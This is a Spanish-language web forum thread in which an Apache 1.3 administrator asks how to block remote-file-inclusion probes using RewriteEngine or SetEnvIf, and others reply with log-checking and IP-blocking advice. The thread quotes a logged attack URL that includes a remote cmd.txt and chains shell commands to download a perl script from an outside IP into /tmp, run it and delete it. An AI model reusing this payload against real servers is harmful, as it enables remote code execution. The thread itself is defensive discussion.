Apache 1.3 y SetEnvIf / RewriteEngine

Saludos!

No sé si alguno os habréis encontrado con este problema: de vez en cuando, algun lamer aburridillo trastea en nuestro servidor apache, intentando hacer cositas como esta: (escribo "ttp" en vez de "http" porque el foro se pone suspicaz al ser mi primer mensaje )

GET /nuke/index.php?config=1&base_datapath=ttp ://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20ttp://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%2 0WMNews*? HTTP/1.0

como véis, intenta descargar un cmd.txt desde otro server. Bien, pensando un poco y mirando la doc del apache, pensé que utilizando SetEnvIf o incluso el modulo de rewrite, podría solucionarlo, pero no hay manera...

Por ejemplo, este rewrite:
RewriteEngine on
RedirectMatch permanent (.*)cmd(.*)$ ttp://hacktry.com

solo 'pilla' urls del tipo fichero.php/cmd
no urls del tipo fichero.php?cmd
parece como si ni el rewrite ni el setenvif tuvieran en cuenta lo que haya después de la interrogación (es decir, los parámetros de la página)

¿Hay alguna manera de detectar esto?

Gracias

Saludos

Primero se ve que el scripts del hacker esta fallando o es un novato que se lo =bajo de alguna pagina para probar por que falta el h en http, lo importante es que primero debes ver en log es que no haya encontrado la pagina y tenga error, sino ya te instalo el scripts cnd en el directorio .tmp y te combiene hacer un comando en el tmp "ls -la"porque te va ocultar los progrma de ejecución.

luego usa este scripts desde el shell

cambiar la ruta del log de tu apache si no coincide con el que te puse yo.

Esto te mostrara todos los IP que han intentado correr ese scripts y luego debes bloquear esos IP, te recomiendo primero bloquear el IP: 210.204.138.43
a si si logra encontrar una vulnerabilidad en tu server no podra instalar desde el IP: 210.204.138.43 el cmd.txt y asi no tendra efecto el ataque.

Gracias por la pronta respuesta

Obviamente, esto es un robot de vulnerabilidades, ya he comprobado estado de máquina, quienes han intentado acceder al script y demás. El hecho es que como solución, el bloqueo de ip me parece insuficiente, y mirarlo en las trazas después de que ocurra, aunque el servidor está bien protegido, pues no me gusta; lo que quería era bloquearlo de raiz desde la config de apache, mediante un rewrite de la URI cuando encontrase ciertos elementos en la URI (entre los parámetros) o un SetEnvIf, pero por alguna razón no consigo que coja ninguna expresión regular que capture la cadena "cmd" después de la ? de los parámetros de la URI

no sé si tienes un servidor web o tu servidor solo contiene una pagina, pero si capturas el URI despuies de ? vas a dejar muchos de los php instaldos en el servidor fuera de combate

Otraq cosa , no solamente usan cmd.txt, usan tambien el tool25.txt, y seguuimos te combiene por ejemplo buscar esto, te daras cuenta de muchisimos ataques con este metodo